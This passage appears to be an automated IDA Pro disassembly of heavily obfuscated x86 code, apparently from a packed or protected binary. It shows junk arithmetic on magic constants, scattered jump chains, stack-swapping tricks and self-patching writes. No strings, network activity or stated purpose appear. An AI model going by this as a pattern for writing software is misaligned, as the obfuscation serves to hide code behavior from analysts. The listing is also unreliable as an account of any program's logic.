; END OF FUNCTION CHUNK	FOR sub_43B3BE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448FB0

loc_444C0A:				; CODE XREF: sub_448FB0+FBBDj
		add	eax, 28h
		mov	[ebp-4], eax
		push	offset sub_43961E

loc_444C15:				; CODE XREF: sub_453405:loc_45587Ej
		jmp	nullsub_340
; END OF FUNCTION CHUNK	FOR sub_448FB0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448BC0

loc_444C1A:				; CODE XREF: sub_448BC0:loc_440015j
					; sub_448BC0-8B95j
		add	edx, 0DF5C15AEh
		popf
		add	eax, edx
		pop	edx
		xor	eax, 7114C82Eh
		jnb	loc_453F8F
		jmp	loc_451D8A
; END OF FUNCTION CHUNK	FOR sub_448BC0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442334

loc_444C35:				; CODE XREF: sub_442334+14BA6j
		jz	loc_453D8A
		shr	eax, 1Ch
		cdq
		jmp	loc_452BDA
; END OF FUNCTION CHUNK	FOR sub_442334
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453422

loc_444C44:				; CODE XREF: sub_453422-C5Bj
					; hvvrg7ie:00453D7Fj
		and	eax, 0FB7D484Bh
		xor	eax, 1B896644h
		add	eax, ebp
		add	eax, 5C1AD9EDh
		mov	eax, [eax]
		push	eax
		push	0
; END OF FUNCTION CHUNK	FOR sub_453422
; START	OF FUNCTION CHUNK FOR sub_44059F

loc_444C5D:				; CODE XREF: sub_44059F:loc_452719j
		push	10h
		jmp	loc_45305C
; END OF FUNCTION CHUNK	FOR sub_44059F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C05

loc_444C64:				; CODE XREF: sub_440C05-70E1j
		not	ecx
		mov	ebx, edx
		jmp	loc_4562E7
; END OF FUNCTION CHUNK	FOR sub_440C05

; =============== S U B	R O U T	I N E =======================================



sub_444C6D	proc near		; DATA XREF: sub_4466A4:loc_4582B6o

; FUNCTION CHUNK AT 00441502 SIZE 00000005 BYTES

		mov	eax, [esp+0]
		push	edx
		call	sub_4500E7
		push	offset sub_453B74
		jmp	loc_441502
sub_444C6D	endp

; ---------------------------------------------------------------------------

loc_444C80:				; CODE XREF: hvvrg7ie:00453C4Bj
		xchg	eax, [ebp+0]
; START	OF FUNCTION CHUNK FOR sub_43C0DE

loc_444C83:				; CODE XREF: sub_43C0DE+17B60j
		xor	eax, 0F2B2CBEDh
		push	esi
		pushf
		push	97BCCDE8h
		pop	esi
		jmp	loc_4587BF
; END OF FUNCTION CHUNK	FOR sub_43C0DE
; ---------------------------------------------------------------------------

loc_444C96:				; CODE XREF: hvvrg7ie:004416EFj
		jnp	near ptr dword_440658+6

; =============== S U B	R O U T	I N E =======================================



sub_444C9C	proc near		; CODE XREF: sub_458706:loc_43E7B4p

; FUNCTION CHUNK AT 00439C50 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043B310 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043D6ED SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		add	eax, 358EA95h
		mov	eax, [eax]
		jmp	loc_439C50
sub_444C9C	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_444CAD:				; CODE XREF: hvvrg7ie:0044E1C3j
		push	edx
		call	sub_4425F0
		mov	eax, 0A7A44D83h
		call	sub_450C5A
		push	edi
		push	32050D7Fh
		jmp	loc_454A09
; ---------------------------------------------------------------------------
		mov	ds:off_41D03C, eax
		lea	eax, sub_43D574
		mov	byte ptr [eax],	0C3h
		jmp	sub_43D574
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D574

loc_444CDC:				; CODE XREF: sub_43D574+1j
		mov	eax, [esp-4+arg_0]
		push	edx
		jmp	loc_4442D6
; END OF FUNCTION CHUNK	FOR sub_43D574

; =============== S U B	R O U T	I N E =======================================



sub_444CE5	proc near		; CODE XREF: hvvrg7ie:00441C9Aj
					; DATA XREF: sub_442F6B+53F6o
		mov	edx, [esp+0]
		push	ecx
		mov	ecx, eax
sub_444CE5	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_440643

loc_444CEB:				; CODE XREF: sub_440643-480Dj
		xchg	ecx, [esp+0]
		jmp	loc_44C4D0
; END OF FUNCTION CHUNK	FOR sub_440643

; =============== S U B	R O U T	I N E =======================================



sub_444CF3	proc near		; DATA XREF: sub_439AE3+6o

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043F05D SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00447136 SIZE 00000005 BYTES

		push	ebp
		call	sub_448AE0

loc_444CF9:				; CODE XREF: hvvrg7ie:004531D6j
		jmp	loc_43F05D
sub_444CF3	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C6BE

loc_444CFE:				; CODE XREF: sub_44C6BE-9B7j
		jmp	loc_44FDC3
; END OF FUNCTION CHUNK	FOR sub_44C6BE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445CB5

loc_444D03:				; CODE XREF: sub_445CB5+8j
		jmp	loc_45447F
; END OF FUNCTION CHUNK	FOR sub_445CB5
; ---------------------------------------------------------------------------

loc_444D08:				; CODE XREF: hvvrg7ie:00455A68j
		jz	loc_454880

; =============== S U B	R O U T	I N E =======================================



sub_444D0E	proc near		; CODE XREF: sub_4401DB+10p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 004482D3 SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		add	edx, 0F8232F91h
		xchg	edx, [esp-4+arg_0]
		jmp	loc_4482D3
sub_444D0E	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		push	eax
		jmp	sub_451DE8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4440CB

loc_444D26:				; CODE XREF: sub_4440CB+11j
		call	sub_4393BC

loc_444D2B:				; CODE XREF: hvvrg7ie:0045019Ej
		jmp	loc_44D833
; END OF FUNCTION CHUNK	FOR sub_4440CB
; ---------------------------------------------------------------------------

loc_444D30:				; CODE XREF: hvvrg7ie:00444E2Ej
		test	ebp, 0DF6B8259h
		jmp	loc_43A003
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_467. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B70B

loc_444D3C:				; CODE XREF: sub_45B70B+9j
		jmp	loc_44C4B2
; END OF FUNCTION CHUNK	FOR sub_45B70B
; ---------------------------------------------------------------------------

loc_444D41:				; CODE XREF: hvvrg7ie:loc_44C4ADj
		jmp	loc_455B33
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4415C4

loc_444D46:				; CODE XREF: sub_4415C4+1Bj
		mov	eax, [eax]
		jmp	loc_44472B
; END OF FUNCTION CHUNK	FOR sub_4415C4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454099

loc_444D4D:				; CODE XREF: sub_454099:loc_44DCB3j
		cmp	dword ptr [ebp-10Ch], 76676264h
		jnz	loc_4575F8
		jmp	loc_43B9DD
; END OF FUNCTION CHUNK	FOR sub_454099
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E560

loc_444D62:				; CODE XREF: sub_44E560-4427j
		rol	edx, 1Ch
		xor	edx, 3287EA63h
		call	sub_44808A

loc_444D70:				; CODE XREF: sub_44388C-4B1Ej
		jmp	loc_445220
; END OF FUNCTION CHUNK	FOR sub_44E560
; ---------------------------------------------------------------------------

loc_444D75:				; CODE XREF: hvvrg7ie:loc_447356j
		sub	ebx, 479A7B07h
		mov	[eax], esi
		pop	edx
		test	esi, eax
		jmp	loc_445309
; ---------------------------------------------------------------------------

loc_444D85:				; DATA XREF: sub_451BAD+6CA7o
		popf
		xchg	edx, [esp]
		jmp	sub_44059F

; =============== S U B	R O U T	I N E =======================================



sub_444D8E	proc near		; CODE XREF: sub_44A2D1:loc_442880p

; FUNCTION CHUNK AT 004454CD SIZE 0000000F BYTES

		mov	eax, large fs:0

loc_444D95:				; CODE XREF: sub_4454C6j
					; sub_444D8E+747j
		js	loc_4454CD
		cmp	dword ptr [eax], 0FFFFFFFFh

loc_444D9E:				; CODE XREF: hvvrg7ie:loc_446638j
		mov	ebx, [eax+4]
		mov	eax, [eax]
		push	offset sub_4454C6
		jmp	nullsub_144
sub_444D8E	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44191F

loc_444DAD:				; CODE XREF: sub_44191F:loc_45ACE5j
		xor	esi, ebx
		and	edi, 0E0AC7333h
		jmp	loc_43F89A
; END OF FUNCTION CHUNK	FOR sub_44191F

; =============== S U B	R O U T	I N E =======================================



sub_444DBA	proc near		; DATA XREF: hvvrg7ie:0043A2D9o
		mov	[edx], eax
		xchg	ebx, [esp+0]
		mov	edx, ebx
		pop	ebx
		jmp	sub_43A319
sub_444DBA	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_444. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441242

loc_444DC8:				; CODE XREF: sub_441242+10j
		jmp	loc_455DE0
; END OF FUNCTION CHUNK	FOR sub_441242
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E533

loc_444DCD:				; CODE XREF: sub_44E533+B3FAj
		pop	eax
		xor	eax, 24FE0D15h
		sub	eax, 918023A6h
		rol	eax, 1Dh
		jmp	loc_440E6C
; END OF FUNCTION CHUNK	FOR sub_44E533
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4465A6

loc_444DE2:				; CODE XREF: sub_44DF8A:loc_43C926j
					; sub_4465A6-530Ej ...
		jz	loc_43B209
		push	779027CDh
; END OF FUNCTION CHUNK	FOR sub_4465A6
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_444DED:				; CODE XREF: sub_44D2F8:loc_4431FFj
		pop	eax
		and	eax, 7DBD9701h
		sub	eax, 0A338BC8Eh
		add	eax, 0A7152FEDh
		or	eax, 22039856h
		jmp	loc_449EAC
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AA38

loc_444E0B:				; CODE XREF: sub_45AA38-1A791j
		jo	loc_45813D
		popf
		jle	loc_43A380

loc_444E18:				; CODE XREF: sub_45AA38:loc_440298j
		add	esi, 0F1F04A38h
; END OF FUNCTION CHUNK	FOR sub_45AA38
; START	OF FUNCTION CHUNK FOR sub_45A234

loc_444E1E:				; CODE XREF: sub_45A234:loc_43BF86j
		push	offset loc_43ECC5
		jmp	nullsub_401
; END OF FUNCTION CHUNK	FOR sub_45A234
; ---------------------------------------------------------------------------
		or	esi, 401C9F6Ah
		jmp	loc_444D30
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_534. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452488

loc_444E34:				; CODE XREF: sub_452488+17j
		mov	ebp, edi
		pop	edi
		xor	eax, eax
		retn
; END OF FUNCTION CHUNK	FOR sub_452488
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4420E2

loc_444E3A:				; CODE XREF: sub_4420E2+Dj
		jmp	sub_455751
; END OF FUNCTION CHUNK	FOR sub_4420E2
; ---------------------------------------------------------------------------

loc_444E3F:				; CODE XREF: hvvrg7ie:0043F50Cj
		jmp	loc_44D806
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D285

loc_444E44:				; CODE XREF: sub_43D285-3260j
		jmp	loc_453BB5
; END OF FUNCTION CHUNK	FOR sub_43D285

; =============== S U B	R O U T	I N E =======================================



sub_444E49	proc near		; CODE XREF: sub_4408FA:loc_43B3D3p
					; sub_43FA83+4p ...

; FUNCTION CHUNK AT 00442098 SIZE 0000000D BYTES

		jz	sub_45717D
		push	ebp
		mov	ebp, esp
		push	ecx

loc_444E53:				; CODE XREF: sub_446EC2-90D4j
		jmp	loc_442098
sub_444E49	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449CB1

loc_444E58:				; CODE XREF: sub_449CB1:loc_44B4E0j
		push	0CE43649Eh
		pop	eax
		add	eax, 5FEC1BA8h
		rol	eax, 4
		or	eax, 7808A1ADh
		xor	eax, 0D8C614D1h
		add	eax, 0DE04ED1Ah
		jmp	loc_43C765
; END OF FUNCTION CHUNK	FOR sub_449CB1
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_151. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448FB0

loc_444E7F:				; CODE XREF: sub_448FB0+8611j
		jmp	loc_439060
; END OF FUNCTION CHUNK	FOR sub_448FB0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45202B

loc_444E84:				; CODE XREF: sub_45202B:loc_4470C5j
		shr	edx, 1Fh
		mov	[ebx], edi
		jmp	loc_4485BC
; END OF FUNCTION CHUNK	FOR sub_45202B

; =============== S U B	R O U T	I N E =======================================



sub_444E8E	proc near		; CODE XREF: hvvrg7ie:0043AE0Aj
					; hvvrg7ie:0044BB87p

; FUNCTION CHUNK AT 00443EA4 SIZE 00000018 BYTES

		xchg	eax, [esp+0]
		pop	eax
		push	eax
		push	4B99498h
		jmp	loc_443EA4
sub_444E8E	endp

; ---------------------------------------------------------------------------

loc_444E9D:				; CODE XREF: hvvrg7ie:00452392j
		jo	loc_452799
; START	OF FUNCTION CHUNK FOR sub_4408AE

loc_444EA3:				; CODE XREF: sub_4408AE:loc_45397Bj
		sub	edi, 7DA06A6Dh
		test	edi, 80h
		jmp	loc_457659
; END OF FUNCTION CHUNK	FOR sub_4408AE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4544DD

loc_444EB4:				; CODE XREF: sub_4544DD:loc_44F65Bj
		add	eax, 3A7A8EBEh
		mov	eax, [eax]
		push	eax
		push	edx
		push	0D0D3374Ch
		jmp	loc_44920F
; END OF FUNCTION CHUNK	FOR sub_4544DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BFF5

loc_444EC8:				; CODE XREF: sub_44BFF5-495Bj
		jnz	loc_45758E
		jmp	loc_44EBFE
; END OF FUNCTION CHUNK	FOR sub_44BFF5
; ---------------------------------------------------------------------------

loc_444ED3:				; CODE XREF: hvvrg7ie:0044ED35j
		jnp	loc_44E03F
		mov	[edi], ecx
		jmp	sub_442B3C
; ---------------------------------------------------------------------------

locret_444EE0:				; CODE XREF: hvvrg7ie:00451EBEj
		retn
; ---------------------------------------------------------------------------

locret_444EE1:				; CODE XREF: hvvrg7ie:00449DBDj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BFF5

loc_444EE2:				; CODE XREF: sub_44BFF5-F303j
		jmp	loc_447CA9
; END OF FUNCTION CHUNK	FOR sub_44BFF5
; ---------------------------------------------------------------------------
		add	eax, esi
		jmp	sub_456F18
; ---------------------------------------------------------------------------
		call	sub_44A4E8

loc_444EF3:				; CODE XREF: hvvrg7ie:00459145j
		jmp	loc_44311F
; ---------------------------------------------------------------------------

loc_444EF8:				; CODE XREF: hvvrg7ie:0044E49Bj
		jmp	loc_4467B7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43A839

loc_444EFD:				; CODE XREF: sub_43A839+197BDj
		pop	edx
		retn
; END OF FUNCTION CHUNK	FOR sub_43A839
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A91B

loc_444EFF:				; CODE XREF: sub_45A91B-12A1Aj
		jmp	loc_4571E6
; END OF FUNCTION CHUNK	FOR sub_45A91B
; ---------------------------------------------------------------------------

loc_444F04:				; CODE XREF: hvvrg7ie:0043A429j
		rol	eax, 10h
		call	sub_45B7BD
; START	OF FUNCTION CHUNK FOR sub_4584A8

loc_444F0C:				; CODE XREF: sub_4584A8+Fj
		jmp	nullsub_533
; END OF FUNCTION CHUNK	FOR sub_4584A8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44388C

loc_444F11:				; CODE XREF: sub_44388C+A63Fj
		jmp	loc_43C5B0
; END OF FUNCTION CHUNK	FOR sub_44388C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450246

loc_444F16:				; CODE XREF: sub_450246-6704j
		jl	loc_459F7C
		jmp	loc_440CD6
; END OF FUNCTION CHUNK	FOR sub_450246

; =============== S U B	R O U T	I N E =======================================



sub_444F21	proc near		; CODE XREF: sub_4485A2:loc_444146p
					; hvvrg7ie:004490F9j

; FUNCTION CHUNK AT 00443059 SIZE 00000002 BYTES
; FUNCTION CHUNK AT 0044570F SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		mov	dword ptr [ebp-8], 1

loc_444F2C:				; CODE XREF: hvvrg7ie:004433BEj
					; sub_448057:loc_44D7D4j
		mov	eax, [ebp-8]
		pop	ecx
		pop	ecx
		jmp	loc_44570F
sub_444F21	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444BE1

loc_444F36:				; CODE XREF: sub_444BE1:loc_44FABEj
		and	edi, 0BD491340h
		test	edi, 800h
		jmp	loc_4397DD
; END OF FUNCTION CHUNK	FOR sub_444BE1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454D37

loc_444F47:				; CODE XREF: sub_454D37:loc_43EE9Fj
		xchg	ecx, [esp+0]
		jmp	loc_45A0D4
; END OF FUNCTION CHUNK	FOR sub_454D37
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458374

loc_444F4F:				; CODE XREF: sub_458374-18258j
		adc	ebx, 0D9C3AA90h
		jmp	loc_455C3C
; END OF FUNCTION CHUNK	FOR sub_458374
; ---------------------------------------------------------------------------
		push	eax
		call	sub_444F61
		retn

; =============== S U B	R O U T	I N E =======================================



sub_444F61	proc near		; CODE XREF: hvvrg7ie:00444F5Bp

; FUNCTION CHUNK AT 00446D22 SIZE 00000005 BYTES

		push	offset sub_452AA0
		jmp	loc_446D22
sub_444F61	endp

; ---------------------------------------------------------------------------

loc_444F6B:				; CODE XREF: hvvrg7ie:00447B21j
		and	ebx, 64B2E89Ch

; =============== S U B	R O U T	I N E =======================================



sub_444F71	proc near		; CODE XREF: sub_444B29-6DB4p
		xchg	edi, [esp+0]
		pop	edi
		mov	eax, ds:dword_43D6E4
		call	sub_43D247
sub_444F71	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_444F80	proc near		; DATA XREF: sub_43C836o

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00439186 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446BC4 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00447121 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449D01 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004582F3 SIZE 00000018 BYTES

		push	ebp
		mov	ebp, esp
		push	ebp
		mov	ebp, ecx
		xchg	ebp, [esp+4+var_4]
		mov	[ebp+var_4], eax
		mov	eax, [ebp+var_4]
		jmp	loc_447121
sub_444F80	endp

; ---------------------------------------------------------------------------

loc_444F94:				; CODE XREF: hvvrg7ie:00442FF5j
		or	esi, 0C9D3E147h
; START	OF FUNCTION CHUNK FOR sub_43A89A

loc_444F9A:				; CODE XREF: sub_43A89A+874Fj
		and	ebx, 0D99F253Bh
		add	ebx, 0F02AB058h
		popf
		xchg	ebx, [esp-4+arg_0]
		jmp	loc_43D519
; END OF FUNCTION CHUNK	FOR sub_43A89A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4544DD

loc_444FAF:				; CODE XREF: sub_4544DD+11j
		call	sub_45A98D
		cmp	ds:dword_4578C0, 0

loc_444FBB:				; CODE XREF: hvvrg7ie:00454A59j
		jnz	loc_45779E
		jmp	loc_439ECC
; END OF FUNCTION CHUNK	FOR sub_4544DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44370F

loc_444FC6:				; CODE XREF: sub_44370F:loc_440C39j
					; hvvrg7ie:00440C4Ej
		add	esi, 5BC43C59h
		xchg	esi, [esp+8+var_8]
		jmp	sub_45329F
; END OF FUNCTION CHUNK	FOR sub_44370F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_244. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_444FD5:				; CODE XREF: hvvrg7ie:0045A088j
		jmp	loc_43CA85
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C6D7

loc_444FDA:				; CODE XREF: sub_44C6D7:loc_459DFAj
		jz	loc_446FA9
		jmp	loc_454E48
; END OF FUNCTION CHUNK	FOR sub_44C6D7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B048

loc_444FE5:				; CODE XREF: sub_45B048:loc_451FCDj
		rol	eax, 16h
		sub	eax, 53736862h
		and	eax, 335481C5h
		test	eax, 40000h
		jmp	loc_45A822
; END OF FUNCTION CHUNK	FOR sub_45B048
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E163

loc_444FFF:				; CODE XREF: sub_43E163:loc_44447Bj
		rol	esi, 15h

loc_445002:				; CODE XREF: sub_44955C-E2FAj
		xor	esi, 23A2571Ah
		test	esi, 1000h
		jmp	loc_447252
; END OF FUNCTION CHUNK	FOR sub_43E163
; ---------------------------------------------------------------------------

loc_445013:				; CODE XREF: hvvrg7ie:0044AD5Bj
		xchg	ecx, [esp]
		pop	ecx
		push	0B5E09C28h
		pop	eax
		xor	eax, 0BEDDE9A9h
		and	eax, 0B659DFDCh
		jmp	loc_43F208
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DD3E

loc_44502E:				; CODE XREF: hvvrg7ie:00440F11j
					; sub_44DD3E+D5F1j
		add	ecx, 0C5D2F94h
		xchg	ecx, [esp+4+var_4]
		jmp	sub_449007
; END OF FUNCTION CHUNK	FOR sub_44DD3E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B94B

loc_44503C:				; CODE XREF: sub_45B94B:loc_454BE0j
		push	ecx
		mov	esp, ebp
		xchg	eax, [esp+0]
		mov	ebp, eax
		pop	eax
		push	0DECEC6D7h
		pop	eax
		jmp	loc_457763
; END OF FUNCTION CHUNK	FOR sub_45B94B
; ---------------------------------------------------------------------------
		sub	esi, ebx
		jmp	loc_44778D
; ---------------------------------------------------------------------------

loc_445057:				; DATA XREF: sub_43F227+15CCCo
		xchg	esi, [esp]
		mov	edx, esi
		pop	esi
		add	edx, 0B2F8135h
		jmp	loc_4580E4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454BA2

loc_445068:				; CODE XREF: sub_454BA2+1Cj
		and	edx, 0A447D70Bh
		add	edx, 5BFEDDB7h
		xchg	edx, [esp+0]
		jmp	sub_44059F
; END OF FUNCTION CHUNK	FOR sub_454BA2
; ---------------------------------------------------------------------------
		push	offset loc_4567ED
		jmp	locret_449AC1
; ---------------------------------------------------------------------------
		mov	ds:dword_41D104, eax
		lea	eax, nullsub_1
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_1
; ---------------------------------------------------------------------------
		xchg	eax, [esp]
		jmp	loc_4574CC
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_215. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4465A6

loc_4450A3:				; CODE XREF: sub_4465A6-7B7j
		jmp	loc_441291
; END OF FUNCTION CHUNK	FOR sub_4465A6

; =============== S U B	R O U T	I N E =======================================



sub_4450A8	proc near		; CODE XREF: sub_441B65+4p
					; sub_442ADB+Cp
		call	sub_43E9D6
sub_4450A8	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_4450AD:				; CODE XREF: sub_44D2F8+Ej
		jmp	loc_453B69
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455B9C

loc_4450B2:				; CODE XREF: sub_455B9C-149D7j
		jz	loc_43CFDC
		jmp	loc_43F2ED
; END OF FUNCTION CHUNK	FOR sub_455B9C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446D8D

loc_4450BD:				; CODE XREF: sub_446D8D:loc_44B661j
		or	eax, 8
		or	eax, 10h
		mov	edx, [ebp+8]
		mov	[edx-8], eax
		jmp	loc_455D23
; ---------------------------------------------------------------------------

loc_4450CE:				; CODE XREF: sub_446D8D-1897j
		push	offset sub_44A711
		jmp	nullsub_133
; END OF FUNCTION CHUNK	FOR sub_446D8D

; =============== S U B	R O U T	I N E =======================================



sub_4450D8	proc near		; DATA XREF: sub_45B048-12E46o

; FUNCTION CHUNK AT 0043A16B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043DD6A SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044825E SIZE 0000001A BYTES

		xchg	ecx, [esp+0]
		mov	eax, ecx
		pop	ecx
		or	eax, 0F36BF59Fh
		add	eax, 0C1408B3h
		jmp	loc_43A16B
sub_4450D8	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440881

loc_4450EF:				; CODE XREF: sub_440881+DD3Ej
		mov	[edi], ecx
		xchg	ecx, [edi]
		shl	ecx, 1Eh
		sbb	eax, ebx
		adc	ebp, 0B2047F14h
		jmp	loc_4486DB
; END OF FUNCTION CHUNK	FOR sub_440881
; ---------------------------------------------------------------------------
		sub	edi, esi
		pop	ebp
		jmp	sub_4567A2
; ---------------------------------------------------------------------------
		push	edi
		push	1D70F369h
		pop	edi
		and	edi, 0A912B3B4h
		xor	edi, 73733356h
; START	OF FUNCTION CHUNK FOR sub_44C2EA

loc_44511E:				; CODE XREF: sub_44C2EA:loc_44F5A2j
		jmp	loc_440F1C
; END OF FUNCTION CHUNK	FOR sub_44C2EA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44808A

loc_445123:				; CODE XREF: sub_44808A:loc_456B66j
		jnz	loc_450B5E
		jmp	loc_447066
; END OF FUNCTION CHUNK	FOR sub_44808A
; ---------------------------------------------------------------------------

loc_44512E:				; CODE XREF: hvvrg7ie:00443F1Aj
		ja	loc_44687E
; START	OF FUNCTION CHUNK FOR sub_451BC8

loc_445134:				; CODE XREF: sub_451BC8:loc_43A4B9j
		rol	ecx, 0Dh
		xor	ecx, 10858932h
		or	ecx, 1AC9EC0Bh
		jmp	loc_45A119
; END OF FUNCTION CHUNK	FOR sub_451BC8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C354

loc_445148:				; CODE XREF: sub_43C354:loc_454A54j
		pop	edi
		rol	edi, 1Eh
		add	edi, 0B0DDD817h
		xchg	edi, [esp+4+var_4]
		jmp	sub_44DE0A
; END OF FUNCTION CHUNK	FOR sub_43C354
; ---------------------------------------------------------------------------

loc_44515A:				; CODE XREF: hvvrg7ie:00448A5Dj
		mov	[ebx], eax

loc_44515C:				; CODE XREF: hvvrg7ie:loc_444680j
		call	sub_44A91A

locret_445161:				; CODE XREF: hvvrg7ie:004595FDj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450434

loc_445162:				; CODE XREF: sub_450434-1663Aj
					; hvvrg7ie:0044F467j
		call	sub_439549
		test	al, al
		jz	nullsub_321
		jmp	loc_456075
; END OF FUNCTION CHUNK	FOR sub_450434
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4408FA

loc_445174:				; CODE XREF: sub_4408FA+FB87j
		jnz	loc_450D42
		jmp	loc_44B6A5
; END OF FUNCTION CHUNK	FOR sub_4408FA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E60A

loc_44517F:				; CODE XREF: sub_43E60A+AC23j
					; sub_43E60A+AC4Dj
		or	esi, 6542B2C8h
		sub	esi, 1F4E1B28h
		test	esi, 100h
		jmp	loc_4427C9
; END OF FUNCTION CHUNK	FOR sub_43E60A
; ---------------------------------------------------------------------------

locret_445196:				; CODE XREF: hvvrg7ie:loc_446BDCj
		retn
; ---------------------------------------------------------------------------

loc_445197:				; CODE XREF: hvvrg7ie:00448F21j
		jmp	loc_4511B0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442334

loc_44519C:				; CODE XREF: sub_442334-3DBFj
		jmp	loc_456ED4
; END OF FUNCTION CHUNK	FOR sub_442334
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439E6C

loc_4451A1:				; CODE XREF: sub_439E6C+Bj
		jmp	loc_440A75
; END OF FUNCTION CHUNK	FOR sub_439E6C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439814

loc_4451A6:				; CODE XREF: sub_439814+Aj
		jmp	loc_4399CE
; END OF FUNCTION CHUNK	FOR sub_439814
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_480. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DE01

loc_4451AC:				; CODE XREF: sub_43DE01+9FCEj
		jmp	sub_43A0C9
; END OF FUNCTION CHUNK	FOR sub_43DE01
